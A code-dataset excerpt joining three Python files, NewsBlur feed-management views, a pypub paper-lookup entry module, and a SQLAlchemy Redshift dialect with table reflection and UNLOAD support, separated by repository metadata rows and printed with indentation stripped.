stats['active_premium_subscribers'] = feed.active_premium_subscribers
# Classifier counts
stats['classifier_counts'] = json.decode(feed.data.feed_classifier_counts)
# Fetch histories
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
stats['feed_fetch_history'] = fetch_history['feed_fetch_history']
stats['page_fetch_history'] = fetch_history['page_fetch_history']
stats['feed_push_history'] = fetch_history['push_history']
logging.user(request, "~FBStatistics: ~SB%s" % (feed))
return stats
@json.json_view
def load_feed_settings(request, feed_id):
stats = dict()
feed = get_object_or_404(Feed, pk=feed_id)
user = get_user(request)
timezone = user.profile.timezone
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
stats['feed_fetch_history'] = fetch_history['feed_fetch_history']
stats['page_fetch_history'] = fetch_history['page_fetch_history']
stats['feed_push_history'] = fetch_history['push_history']
stats['duplicate_addresses'] = feed.duplicate_addresses.all()
return stats
@ratelimit(minutes=10, requests=10)
@json.json_view
def exception_retry(request):
user = get_user(request)
feed_id = get_argument_or_404(request, 'feed_id')
reset_fetch = json.decode(request.POST['reset_fetch'])
feed = Feed.get_by_id(feed_id)
original_feed = feed
if not feed:
raise Http404
feed.schedule_feed_fetch_immediately()
changed = False
if feed.has_page_exception:
changed = True
feed.has_page_exception = False
if feed.has_feed_exception:
changed = True
feed.has_feed_exception = False
if not feed.active:
changed = True
feed.active = True
if changed:
feed.save(update_fields=['has_page_exception', 'has_feed_exception', 'active'])
original_fetched_once = feed.fetched_once
if reset_fetch:
logging.user(request, "~FRRefreshing exception feed: ~SB%s" % (feed))
feed.fetched_once = False
else:
logging.user(request, "~FRForcing refreshing feed: ~SB%s" % (feed))
feed.fetched_once = True
if feed.fetched_once != original_fetched_once:
feed.save(update_fields=['fetched_once'])
feed = feed.update(force=True, compute_scores=False, verbose=True)
feed = Feed.get_by_id(feed.pk)
try:
usersub = UserSubscription.objects.get(user=user, feed=feed)
except UserSubscription.DoesNotExist:
usersubs = UserSubscription.objects.filter(user=user, feed=original_feed)
if usersubs:
usersub = usersubs[0]
usersub.switch_feed(feed, original_feed)
else:
return {'code': -1}
usersub.calculate_feed_scores(silent=False)
feeds = {feed.pk: usersub and usersub.canonical(full=True), feed_id: usersub.canonical(full=True)}
return {'code': 1, 'feeds': feeds}
@ajax_login_required
@json.json_view
def exception_change_feed_address(request):
feed_id = request.POST['feed_id']
feed = get_object_or_404(Feed, pk=feed_id)
original_feed = feed
feed_address = request.POST['feed_address']
timezone = request.user.profile.timezone
code = -1
if False and (feed.has_page_exception or feed.has_feed_exception):
# Fix broken feed
logging.user(request, "~FRFixing feed exception by address: %s - ~SB%s~SN to ~SB%s" % (feed, feed.feed_address, feed_address))
feed.has_feed_exception = False
feed.active = True
feed.fetched_once = False
feed.feed_address = feed_address
duplicate_feed = feed.schedule_feed_fetch_immediately()
code = 1
if duplicate_feed:
new_feed = Feed.objects.get(pk=duplicate_feed.pk)
feed = new_feed
new_feed.schedule_feed_fetch_immediately()
new_feed.has_feed_exception = False
new_feed.active = True
new_feed = new_feed.save()
if new_feed.pk != feed.pk:
merge_feeds(new_feed.pk, feed.pk)
else:
# Branch good feed
logging.user(request, "~FRBranching feed by address: ~SB%s~SN to ~SB%s" % (feed.feed_address, feed_address))
try:
feed = Feed.objects.get(hash_address_and_link=Feed.generate_hash_address_and_link(feed_address, feed.feed_link))
except Feed.DoesNotExist:
feed = Feed.objects.create(feed_address=feed_address, feed_link=feed.feed_link)
code = 1
if feed.pk != original_feed.pk:
try:
feed.branch_from_feed = original_feed.branch_from_feed or original_feed
except Feed.DoesNotExist:
feed.branch_from_feed = original_feed
feed.feed_address_locked = True
feed = feed.save()
feed = feed.update()
feed = Feed.get_by_id(feed.pk)
try:
usersub = UserSubscription.objects.get(user=request.user, feed=feed)
except UserSubscription.DoesNotExist:
usersubs = UserSubscription.objects.filter(user=request.user, feed=original_feed)
if usersubs:
usersub = usersubs[0]
usersub.switch_feed(feed, original_feed)
else:
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
return {
'code': -1,
'feed_fetch_history': fetch_history['feed_fetch_history'],
'page_fetch_history': fetch_history['page_fetch_history'],
'push_history': fetch_history['push_history'],
}
usersub.calculate_feed_scores(silent=False)
feed.update_all_statistics()
classifiers = get_classifiers_for_user(usersub.user, feed_id=usersub.feed_id)
feeds = {
original_feed.pk: usersub and usersub.canonical(full=True, classifiers=classifiers),
}
if feed and feed.has_feed_exception:
code = -1
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
return {
'code': code,
'feeds': feeds,
'new_feed_id': usersub.feed_id,
'feed_fetch_history': fetch_history['feed_fetch_history'],
'page_fetch_history': fetch_history['page_fetch_history'],
'push_history': fetch_history['push_history'],
}
@ajax_login_required
@json.json_view
def exception_change_feed_link(request):
feed_id = request.POST['feed_id']
feed = get_object_or_404(Feed, pk=feed_id)
original_feed = feed
feed_link = request.POST['feed_link']
timezone = request.user.profile.timezone
code = -1
if False and (feed.has_page_exception or feed.has_feed_exception):
# Fix broken feed
logging.user(request, "~FRFixing feed exception by link: ~SB%s~SN to ~SB%s" % (feed.feed_link, feed_link))
found_feed_urls = feedfinder.find_feeds(feed_link)
if len(found_feed_urls):
code = 1
feed.has_page_exception = False
feed.active = True
feed.fetched_once = False
feed.feed_link = feed_link
feed.feed_address = found_feed_urls[0]
duplicate_feed = feed.schedule_feed_fetch_immediately()
if duplicate_feed:
new_feed = Feed.objects.get(pk=duplicate_feed.pk)
feed = new_feed
new_feed.schedule_feed_fetch_immediately()
new_feed.has_page_exception = False
new_feed.active = True
new_feed.save()
else:
# Branch good feed
logging.user(request, "~FRBranching feed by link: ~SB%s~SN to ~SB%s" % (feed.feed_link, feed_link))
try:
feed = Feed.objects.get(hash_address_and_link=Feed.generate_hash_address_and_link(feed.feed_address, feed_link))
except Feed.DoesNotExist:
feed = Feed.objects.create(feed_address=feed.feed_address, feed_link=feed_link)
code = 1
if feed.pk != original_feed.pk:
try:
feed.branch_from_feed = original_feed.branch_from_feed or original_feed
except Feed.DoesNotExist:
feed.branch_from_feed = original_feed
feed.feed_link_locked = True
feed.save()
feed = feed.update()
feed = Feed.get_by_id(feed.pk)
try:
usersub = UserSubscription.objects.get(user=request.user, feed=feed)
except UserSubscription.DoesNotExist:
usersubs = UserSubscription.objects.filter(user=request.user, feed=original_feed)
if usersubs:
usersub = usersubs[0]
usersub.switch_feed(feed, original_feed)
else:
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
return {
'code': -1,
'feed_fetch_history': fetch_history['feed_fetch_history'],
'page_fetch_history': fetch_history['page_fetch_history'],
'push_history': fetch_history['push_history'],
}
usersub.calculate_feed_scores(silent=False)
feed.update_all_statistics()
classifiers = get_classifiers_for_user(usersub.user, feed_id=usersub.feed_id)
if feed and feed.has_feed_exception:
code = -1
feeds = {
original_feed.pk: usersub.canonical(full=True, classifiers=classifiers),
}
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
return {
'code': code,
'feeds': feeds,
'new_feed_id': usersub.feed_id,
'feed_fetch_history': fetch_history['feed_fetch_history'],
'page_fetch_history': fetch_history['page_fetch_history'],
'push_history': fetch_history['push_history'],
}
@login_required
def status(request):
if not request.user.is_staff:
logging.user(request, "~SKNON-STAFF VIEWING RSS FEEDS STATUS!")
assert False
return HttpResponseForbidden()
minutes = int(request.GET.get('minutes', 1))
now = datetime.datetime.now()
hour_ago = now - datetime.timedelta(minutes=minutes)
feeds = Feed.objects.filter(last_update__gte=hour_ago).order_by('-last_update')
return render_to_response('rss_feeds/status.xhtml', {
'feeds': feeds
}, context_instance=RequestContext(request))
@required_params('story_id', feed_id=int)
@json.json_view
def original_text(request):
story_id = request.REQUEST.get('story_id')
feed_id = request.REQUEST.get('feed_id')
story_hash = request.REQUEST.get('story_hash', None)
force = request.REQUEST.get('force', False)
debug = request.REQUEST.get('debug', False)
if story_hash:
story, _ = MStory.find_story(story_hash=story_hash)
else:
story, _ = MStory.find_story(story_id=story_id, story_feed_id=feed_id)
if not story:
logging.user(request, "~FYFetching ~FGoriginal~FY story text: ~FRstory not found")
return {'code': -1, 'message': 'Story not found.', 'original_text': None, 'failed': True}
original_text = story.fetch_original_text(force=force, request=request, debug=debug)
return {
'feed_id': feed_id,
'story_id': story_id,
'original_text': original_text,
'failed': not original_text or len(original_text) < 100,
}
@required_params('story_hash')
def original_story(request):
story_hash = request.REQUEST.get('story_hash')
force = request.REQUEST.get('force', False)
debug = request.REQUEST.get('debug', False)
story, _ = MStory.find_story(story_hash=story_hash)
if not story:
logging.user(request, "~FYFetching ~FGoriginal~FY story page: ~FRstory not found")
return {'code': -1, 'message': 'Story not found.', 'original_page': None, 'failed': True}
original_page = story.fetch_original_page(force=force, request=request, debug=debug)
return HttpResponse(original_page or "")
@required_params('story_hash')
@json.json_view
def story_changes(request):
story_hash = request.REQUEST.get('story_hash', None)
show_changes = is_true(request.REQUEST.get('show_changes', True))
story, _ = MStory.find_story(story_hash=story_hash)
if not story:
logging.user(request, "~FYFetching ~FGoriginal~FY story page: ~FRstory not found")
return {'code': -1, 'message': 'Story not found.', 'original_page': None, 'failed': True}
return {
'story': Feed.format_story(story, show_changes=show_changes)
}
|
nriley/NewsBlur
|
apps/rss_feeds/views.py
|
Python
|
mit
| 21,500 | 0.005302 |
import pypub.publishers.pub_resolve as pub_resolve
from pypub.paper_info import PaperInfo
def get_paper_info(doi=None, url=None):
"""
Parameters
----------
doi :
url :
Returns
-------
Errors
------
UnsupportedPublisherError : Retrieval of information from this publisher is not yet available
"""
if doi is not None:
publisher = pub_resolve.publisher_from_doi(doi)
paper_info = publisher.get_paper_info(doi=doi)
elif url is not None:
publisher = pub_resolve.publisher_from_url(url)
paper_info = publisher.get_paper_info(url=url)
else:
raise Exception
'''
# Resolve DOI or URL through PyPub pub_resolve methods
publisher_base_url, full_url = pub_resolve.get_publisher_urls(doi=doi, url=url)
pub_dict = pub_resolve.get_publisher_site_info(publisher_base_url)
# Create a PaperInfo object to hold all information and call appropriate scraper
paper_info = PaperInfo(doi=doi, scraper_obj=pub_dict['object'], url=full_url)
paper_info.populate_info()
'''
return paper_info
def get_references():
pass
def get_publisher(doi=None, url=None):
#This could return the publisher given this information.
#This function is low priority
pass
|
ScholarTools/pypub
|
pypub/entry_functions.py
|
Python
|
mit
| 1,300 | 0.009231 |
from collections import defaultdict
import numbers
import pkg_resources
import re
import sqlalchemy as sa
from sqlalchemy import schema, exc, inspect, Column
from sqlalchemy.dialects.postgresql.base import PGDDLCompiler, PGCompiler
from sqlalchemy.dialects.postgresql.psycopg2 import PGDialect_psycopg2
from sqlalchemy.engine import reflection
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql.expression import BindParameter, Executable, ClauseElement
from sqlalchemy.types import VARCHAR, NullType
try:
from alembic.ddl import postgresql
except ImportError:
pass
else:
from alembic.ddl.base import RenameTable
compiles(RenameTable, 'redshift')(postgresql.visit_rename_table)
class RedshiftImpl(postgresql.PostgresqlImpl):
__dialect__ = 'redshift'
# Regex for parsing and identity constraint out of adsrc, e.g.:
# "identity"(445178, 0, '1,1'::text)
IDENTITY_RE = re.compile(r"""
"identity" \(
(?P<current>-?\d+)
,\s
(?P<base>-?\d+)
,\s
'(?P<seed>-?\d+),(?P<step>-?\d+)'
.*
\)
""", re.VERBOSE)
# Regex for SQL identifiers (valid table and column names)
SQL_IDENTIFIER_RE = re.compile(r"""
[_a-zA-Z][\w$]* # SQL standard identifier
| # or
(?:"[^"]+")+ # SQL delimited (quoted) identifier
""", re.VERBOSE)
# Regex for foreign key constraints, e.g.:
# FOREIGN KEY(col1) REFERENCES othertable (col2)
# See https://docs.aws.amazon.com/redshift/latest/dg/r_names.html
# for a definition of valid SQL identifiers.
FOREIGN_KEY_RE = re.compile(r"""
^FOREIGN\ KEY \s* \( # FOREIGN KEY, arbitrary whitespace, literal '('
(?P<columns> # Start a group to capture the referring columns
(?: # Start a non-capturing group
\s* # Arbitrary whitespace
([_a-zA-Z][\w$]* | ("[^"]+")+) # SQL identifier
\s* # Arbitrary whitespace
,? # There will be a colon if this isn't the last one
)+ # Close the non-capturing group; require at least one
) # Close the 'columns' group
\s* \) # Arbitrary whitespace and literal ')'
\s* REFERENCES \s*
(?P<referred_table> # Start a group to capture the referred table name
([_a-zA-Z][\w$]* | ("[^"]*")+) # SQL identifier
)
\s* \( \s* # Literal '(' surrounded by arbitrary whitespace
(?P<referred_column> # Start a group to capture the referred column name
([_a-zA-Z][\w$]* | ("[^"]*")+) # SQL identifier
)
\s* \) # Arbitrary whitespace and literal ')'
""", re.VERBOSE)
# Regex for primary key constraints, e.g.:
# PRIMARY KEY (col1, col2)
PRIMARY_KEY_RE = re.compile(r"""
^PRIMARY \s* KEY \s* \( # FOREIGN KEY, arbitrary whitespace, literal '('
(?P<columns> # Start a group to capture column names
(?:
\s* # Arbitrary whitespace
( [_a-zA-Z][\w$]* | ("[^"]*")+ ) # SQL identifier or delimited identifier
\s* # Arbitrary whitespace
,? # There will be a colon if this isn't the last one
)+ # Close the non-capturing group; require at least one
)
\s* \) \s* # Arbitrary whitespace and literal ')'
""", re.VERBOSE)
def _get_relation_key(name, schema):
if schema is None:
return name
else:
return schema + "." + name
def _get_schema_and_relation(key):
if '.' not in key:
return (None, key)
identifiers = SQL_IDENTIFIER_RE.findall(key)
if len(identifiers) == 1:
return (None, key)
elif len(identifiers) == 2:
return identifiers
raise ValueError("%s does not look like a valid relation identifier")
def unquoted(key):
"""
Return *key* with one level of double quotes removed.
Redshift stores some identifiers without quotes in internal tables,
even though the name must be quoted elsewhere.
In particular, this happens for tables named as a keyword.
"""
if key.startswith('"') and key.endswith('"'):
return key[1:-1]
return key
class RedshiftCompiler(PGCompiler):
def visit_now_func(self, fn, **kw):
return "SYSDATE"
class RedShiftDDLCompiler(PGDDLCompiler):
"""
Handles Redshift-specific CREATE TABLE syntax.
Users can specify the DISTSTYLE, DISTKEY, SORTKEY and ENCODE properties per
table and per column.
Table level properties can be set using the dialect specific syntax. For
example, to specify a distribution key and style you apply the following ::
>>> import sqlalchemy as sa
>>> from sqlalchemy.schema import CreateTable
>>> engine = sa.create_engine('redshift+psycopg2://example')
>>> metadata = sa.MetaData()
>>> user = sa.Table(
... 'user',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String),
... redshift_diststyle='KEY',
... redshift_distkey='id',
... redshift_interleaved_sortkey=['id', 'name'],
... )
>>> print(CreateTable(user).compile(engine))
<BLANKLINE>
CREATE TABLE "user" (
id INTEGER NOT NULL,
name VARCHAR,
PRIMARY KEY (id)
) DISTSTYLE KEY DISTKEY (id) INTERLEAVED SORTKEY (id, name)
<BLANKLINE>
<BLANKLINE>
A single sort key can be applied without a wrapping list ::
>>> customer = sa.Table(
... 'customer',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String),
... redshift_sortkey='id',
... )
>>> print(CreateTable(customer).compile(engine))
<BLANKLINE>
CREATE TABLE customer (
id INTEGER NOT NULL,
name VARCHAR,
PRIMARY KEY (id)
) SORTKEY (id)
<BLANKLINE>
<BLANKLINE>
Column-level special syntax can also be applied using the column info
dictionary. For example, we can specify the ENCODE for a column ::
>>> product = sa.Table(
... 'product',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String, info={'encode': 'lzo'})
... )
>>> print(CreateTable(product).compile(engine))
<BLANKLINE>
CREATE TABLE product (
id INTEGER NOT NULL,
name VARCHAR ENCODE lzo,
PRIMARY KEY (id)
)
<BLANKLINE>
<BLANKLINE>
We can also specify the distkey and sortkey options ::
>>> sku = sa.Table(
... 'sku',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column(
... 'name', sa.String, info={'distkey': True, 'sortkey': True}
... )
... )
>>> print(CreateTable(sku).compile(engine))
<BLANKLINE>
CREATE TABLE sku (
id INTEGER NOT NULL,
name VARCHAR DISTKEY SORTKEY,
PRIMARY KEY (id)
)
<BLANKLINE>
<BLANKLINE>
"""
def post_create_table(self, table):
text = ""
info = table.dialect_options['redshift']
diststyle = info.get('diststyle')
if diststyle:
diststyle = diststyle.upper()
if diststyle not in ('EVEN', 'KEY', 'ALL'):
raise exc.CompileError(
u"diststyle {0} is invalid".format(diststyle)
)
text += " DISTSTYLE " + diststyle
distkey = info.get('distkey')
if distkey:
text += " DISTKEY ({0})".format(distkey)
sortkey = info.get('sortkey')
interleaved_sortkey = info.get('interleaved_sortkey')
if sortkey and interleaved_sortkey:
raise exc.ArgumentError(
"Parameters sortkey and interleaved_sortkey are "
"mutually exclusive; you may not specify both."
)
if sortkey or interleaved_sortkey:
if isinstance(sortkey, str):
keys = [sortkey]
else:
keys = sortkey or interleaved_sortkey
keys = [key.name if isinstance(key, Column) else key
for key in keys]
if interleaved_sortkey:
text += " INTERLEAVED"
text += " SORTKEY ({0})".format(", ".join(keys))
return text
def get_column_specification(self, column, **kwargs):
colspec = self.preparer.format_column(column)
colspec += " " + self.dialect.type_compiler.process(column.type)
default = self.get_column_default_string(column)
if default is not None:
# Identity constraints show up as *default* when reflected.
m = IDENTITY_RE.match(default)
if m:
colspec += " IDENTITY({seed},{step})".format(**m.groupdict())
else:
colspec += " DEFAULT " + default
colspec += self._fetch_redshift_column_attributes(column)
if not column.nullable:
colspec += " NOT NULL"
return colspec
def _fetch_redshift_column_attributes(self, column):
text = ""
if not hasattr(column, 'info'):
return text
info = column.info
identity = info.get('identity')
if identity:
text += " IDENTITY({0},{1})".format(identity[0], identity[1])
encode = info.get('encode')
if encode:
text += " ENCODE " + encode
distkey = info.get('distkey')
if distkey:
text += " DISTKEY"
sortkey = info.get('sortkey')
if sortkey:
text += " SORTKEY"
return text
class RedshiftDialect(PGDialect_psycopg2):
"""
Define Redshift-specific behavior.
Most public methods are overrides of the underlying interfaces defined in
:class:`~sqlalchemy.engine.interfaces.Dialect` and
:class:`~sqlalchemy.engine.Inspector`.
"""
name = 'redshift'
statement_compiler = RedshiftCompiler
ddl_compiler = RedShiftDDLCompiler
construct_arguments = [
(schema.Index, {
"using": False,
"where": None,
"ops": {}
}),
(schema.Table, {
"ignore_search_path": False,
"diststyle": None,
"distkey": None,
"sortkey": None,
"interleaved_sortkey": None,
}),
]
def __init__(self, *args, **kw):
super(RedshiftDialect, self).__init__(*args, **kw)
# Cache domains, as these will be static;
# Redshift does not support user-created domains.
self._domains = None
@reflection.cache
def get_columns(self, connection, table_name, schema=None, **kw):
"""
Return information about columns in `table_name`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_columns`.
"""
cols = self._get_redshift_columns(connection, table_name, schema, **kw)
if not self._domains:
self._domains = self._load_domains(connection)
domains = self._domains
columns = []
for col in cols:
column_info = self._get_column_info(
name=col.name, format_type=col.format_type,
default=col.default, notnull=col.notnull, domains=domains,
enums=[], schema=col.schema, encode=col.encode)
columns.append(column_info)
return columns
@reflection.cache
def get_pk_constraint(self, connection, table_name, schema=None, **kw):
"""
Return information about the primary key constraint on `table_name`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_pk_constraint`.
"""
constraints = self._get_redshift_constraints(connection, table_name,
schema)
pk_constraints = [c for c in constraints if c.contype == 'p']
if not pk_constraints:
return {'constrained_columns': [], 'name': ''}
pk_constraint = pk_constraints[0]
m = PRIMARY_KEY_RE.match(pk_constraint.condef)
colstring = m.group('columns')
constrained_columns = SQL_IDENTIFIER_RE.findall(colstring)
return {
'constrained_columns': constrained_columns,
'name': None,
}
@reflection.cache
def get_foreign_keys(self, connection, table_name, schema=None, **kw):
"""
Return information about foreign keys in `table_name`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_pk_constraint`.
"""
constraints = self._get_redshift_constraints(connection, table_name,
schema)
fk_constraints = [c for c in constraints if c.contype == 'f']
fkeys = []
for constraint in fk_constraints:
m = FOREIGN_KEY_RE.match(constraint.condef)
referred_column = m.group('referred_column')
referred_columns = [referred_column]
referred_table = m.group('referred_table')
referred_table, _, referred_schema = referred_table.partition('.')
colstring = m.group('columns')
constrained_columns = SQL_IDENTIFIER_RE.findall(colstring)
fkey_d = {
'name': None,
'constrained_columns': constrained_columns,
'referred_schema': referred_schema or None,
'referred_table': referred_table,
'referred_columns': referred_columns,
}
fkeys.append(fkey_d)
return fkeys
@reflection.cache
def get_table_names(self, connection, schema=None, **kw):
"""
Return a list of table names for `schema`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_table_names`.
"""
default_schema = inspect(connection).default_schema_name
if not schema:
schema = default_schema
info_cache = kw.get('info_cache')
all_tables, _ = self._get_all_table_and_view_info(connection,
info_cache=info_cache)
table_names = []
for key in all_tables.keys():
this_schema, this_table = _get_schema_and_relation(key)
if this_schema is None:
this_schema = default_schema
if this_schema == schema:
table_names.append(this_table)
return table_names
@reflection.cache
def get_view_names(self, connection, schema=None, **kw):
"""
Return a list of all view names available in the database.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_view_names`.
"""
default_schema = inspect(connection).default_schema_name
if not schema:
schema = self.dialect.default_schema_name
info_cache = kw.get('info_cache')
_, all_views = self._get_all_table_and_view_info(connection,
info_cache=info_cache)
view_names = []
for key in all_views.keys():
this_schema, this_view = _get_schema_and_relation(key)
if this_schema is None:
this_schema = default_schema
if this_schema == schema:
view_names.append(this_view)
return view_names
@reflection.cache
def get_view_definition(self, connection, view_name, schema=None, **kw):
"""Return view definition.
Given a :class:`.Connection`, a string `view_name`,
and an optional string `schema`, return the view definition.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_view_definition`.
"""
view = self._get_redshift_view(connection, view_name, schema, **kw)
return view.view_definition
def get_indexes(self, connection, table_name, schema, **kw):
"""
Return information about indexes in `table_name`.
Because Redshift does not support traditional indexes,
this always returns an empty list.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_indexes`.
"""
return []
@reflection.cache
def get_unique_constraints(self, connection, table_name,
schema=None, **kw):
"""
Return information about unique constraints in `table_name`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_unique_constraints`.
"""
constraints = self._get_redshift_constraints(connection,
table_name, schema)
constraints = [c for c in constraints if c.contype == 'u']
uniques = defaultdict(lambda: defaultdict(dict))
for con in constraints:
uniques[con.conname]["key"] = con.conkey
uniques[con.conname]["cols"][con.attnum] = con.attname
return [
{'name': None,
'column_names': [uc["cols"][i] for i in uc["key"]]}
for name, uc in uniques.items()
]
@reflection.cache
def get_table_options(self, connection, table_name, schema, **kw):
"""
Return a dictionary of options specified when the table of the
given name was created.
See :meth:`~sqlalchemy.engine.Inspector.get_table_options`.
"""
def keyfunc(column):
num = int(column.sortkey)
# If sortkey is interleaved, column numbers alternate
# negative values, so take abs.
return abs(num)
table = self._get_redshift_table(connection, table_name,
schema, **kw)
columns = self._get_redshift_columns(connection, table_name,
schema, **kw)
sortkey_cols = sorted([col for col in columns if col.sortkey],
key=keyfunc)
interleaved = any([int(col.sortkey) < 0 for col in sortkey_cols])
sortkey = [col.name for col in sortkey_cols]
interleaved_sortkey = None
if interleaved:
interleaved_sortkey = sortkey
sortkey = None
distkeys = [col.name for col in columns if col.distkey]
distkey = distkeys[0] if distkeys else None
return {
'redshift_diststyle': table.diststyle,
'redshift_distkey': distkey,
'redshift_sortkey': sortkey,
'redshift_interleaved_sortkey': interleaved_sortkey,
}
def create_connect_args(self, *args, **kwargs):
"""
Build DB-API compatible connection arguments.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.create_connect_args`.
"""
default_args = {
'sslmode': 'verify-full',
'sslrootcert': pkg_resources.resource_filename(
__name__,
'redshift-ssl-ca-cert.pem'
),
}
cargs, cparams = super(RedshiftDialect, self).create_connect_args(
*args, **kwargs
)
default_args.update(cparams)
return cargs, default_args
def _get_column_info(self, *args, **kwargs):
kw = kwargs.copy()
encode = kw.pop('encode', None)
column_info = super(RedshiftDialect, self)._get_column_info(
*args,
**kw
)
if isinstance(column_info['type'], VARCHAR):
if column_info['type'].length is None:
column_info['type'] = NullType()
if 'info' not in column_info:
column_info['info'] = {}
if encode and encode != 'none':
column_info['info']['encode'] = encode
return column_info
def _get_redshift_table(self, connection, table_name, schema=None, **kw):
info_cache = kw.get('info_cache')
all_tables, _ = self._get_all_table_and_view_info(
connection, info_cache=info_cache)
key = _get_relation_key(table_name, schema)
if key not in all_tables.keys():
key = unquoted(key)
return all_tables[key]
def _get_redshift_view(self, connection, view_name, schema=None, **kw):
info_cache = kw.get('info_cache')
_, all_views = self._get_all_table_and_view_info(connection,
info_cache=info_cache)
key = _get_relation_key(view_name, schema)
if key not in all_views.keys():
key = unquoted(key)
return all_views[key]
def _get_redshift_columns(self, connection, table_name, schema=None, **kw):
info_cache = kw.get('info_cache')
all_columns = self._get_all_column_info(connection,
info_cache=info_cache)
key = _get_relation_key(table_name, schema)
if key not in all_columns.keys():
key = unquoted(key)
return all_columns[key]
def _get_redshift_constraints(self, connection, table_name,
schema=None, **kw):
info_cache = kw.get('info_cache')
all_constraints = self._get_all_constraint_info(connection,
info_cache=info_cache)
key = _get_relation_key(table_name, schema)
if key not in all_constraints.keys():
key = unquoted(key)
return all_constraints[key]
@reflection.cache
def _get_all_table_and_view_info(self, connection, **kw):
result = connection.execute("""
SELECT
c.relkind,
n.oid as "schema_oid",
n.nspname as "schema",
c.oid as "rel_oid",
c.relname,
CASE c.reldiststyle
WHEN 0 THEN 'EVEN' WHEN 1 THEN 'KEY' WHEN 8 THEN 'ALL' END
AS "diststyle",
c.relowner AS "owner_id",
u.usename AS "owner_name",
pg_get_viewdef(c.oid) AS "view_definition",
pg_catalog.array_to_string(c.relacl, '\n') AS "privileges"
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
JOIN pg_catalog.pg_user u ON u.usesysid = c.relowner
WHERE c.relkind IN ('r', 'v', 'm', 'S', 'f')
AND n.nspname !~ '^pg_' AND pg_catalog.pg_table_is_visible(c.oid)
ORDER BY c.relkind, n.oid, n.nspname;
""")
tables, views = {}, {}
for rel in result:
schema = rel.schema
if schema == inspect(connection).default_schema_name:
schema = None
key = _get_relation_key(rel.relname, schema)
if rel.relkind == 'r':
tables[key] = rel
if rel.relkind == 'v':
views[key] = rel
self._all_tables_and_views = (tables, views)
return self._all_tables_and_views
@reflection.cache
def _get_all_column_info(self, connection, **kw):
result = connection.execute("""
SELECT
n.nspname as "schema",
c.relname as "table_name",
d.column as "name",
encoding as "encode",
type, distkey, sortkey, "notnull", adsrc, attnum,
pg_catalog.format_type(att.atttypid, att.atttypmod),
pg_catalog.pg_get_expr(ad.adbin, ad.adrelid) AS DEFAULT,
n.oid as "schema_oid",
c.oid as "table_oid"
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n
ON n.oid = c.relnamespace
JOIN pg_catalog.pg_table_def d
ON (d.schemaname, d.tablename) = (n.nspname, c.relname)
JOIN pg_catalog.pg_attribute att
ON (att.attrelid, att.attname) = (c.oid, d.column)
LEFT JOIN pg_catalog.pg_attrdef ad
ON (att.attrelid, att.attnum) = (ad.adrelid, ad.adnum)
WHERE n.nspname !~ '^pg_' AND pg_catalog.pg_table_is_visible(c.oid)
ORDER BY n.nspname, c.relname
""")
all_columns = defaultdict(list)
for col in result:
schema = col.schema
if schema == inspect(connection).default_schema_name:
schema = None
key = _get_relation_key(col.table_name, schema)
all_columns[key].append(col)
self._all_columns = all_columns
return self._all_columns
@reflection.cache
def _get_all_constraint_info(self, connection, **kw):
result = connection.execute("""
SELECT
n.nspname as "schema",
c.relname as "table_name",
t.contype,
t.conname,
t.conkey,
a.attnum,
a.attname,
pg_catalog.pg_get_constraintdef(t.oid, true) as condef,
n.oid as "schema_oid",
c.oid as "rel_oid"
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n
ON n.oid = c.relnamespace
JOIN pg_catalog.pg_constraint t
ON t.conrelid = c.oid
JOIN pg_catalog.pg_attribute a
ON t.conrelid = a.attrelid AND a.attnum = ANY(t.conkey)
WHERE n.nspname !~ '^pg_' AND pg_catalog.pg_table_is_visible(c.oid)
ORDER BY n.nspname, c.relname
""")
all_constraints = defaultdict(list)
for con in result:
schema = con.schema
if schema == inspect(connection).default_schema_name:
schema = None
key = _get_relation_key(con.table_name, schema)
all_constraints[key].append(con)
self._all_constraints = all_constraints
return self._all_constraints
class UnloadFromSelect(Executable, ClauseElement):
''' Prepares a RedShift unload statement to drop a query to Amazon S3
http://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD_command_examples.html
'''
def __init__(self, select, unload_location, access_key, secret_key, session_token='', options={}):
''' Initializes an UnloadFromSelect instance
Args:
self: An instance of UnloadFromSelect
select: The select statement to be unloaded
unload_location: The Amazon S3 bucket where the result will be stored
access_key - AWS Access Key (required)
secret_key - AWS Secret Key (required)
session_token - AWS STS Session Token (optional)
options - Set of optional parameters to modify the UNLOAD sql
parallel: If 'ON' the result will be written to multiple files. If
'OFF' the result will write to one (1) file up to 6.2GB before
splitting
add_quotes: Boolean value for ADDQUOTES; defaults to True
null_as: optional string that represents a null value in unload output
delimiter - File delimiter. Defaults to ','
'''
self.select = select
self.unload_location = unload_location
self.access_key = access_key
self.secret_key = secret_key
self.session_token = session_token
self.options = options
@compiles(UnloadFromSelect)
def visit_unload_from_select(element, compiler, **kw):
''' Returns the actual sql query for the UnloadFromSelect class
'''
return """
UNLOAD ('%(query)s') TO '%(unload_location)s'
CREDENTIALS 'aws_access_key_id=%(access_key)s;aws_secret_access_key=%(secret_key)s%(session_token)s'
DELIMITER '%(delimiter)s'
%(add_quotes)s
%(null_as)s
ALLOWOVERWRITE
PARALLEL %(parallel)s;
""" % \
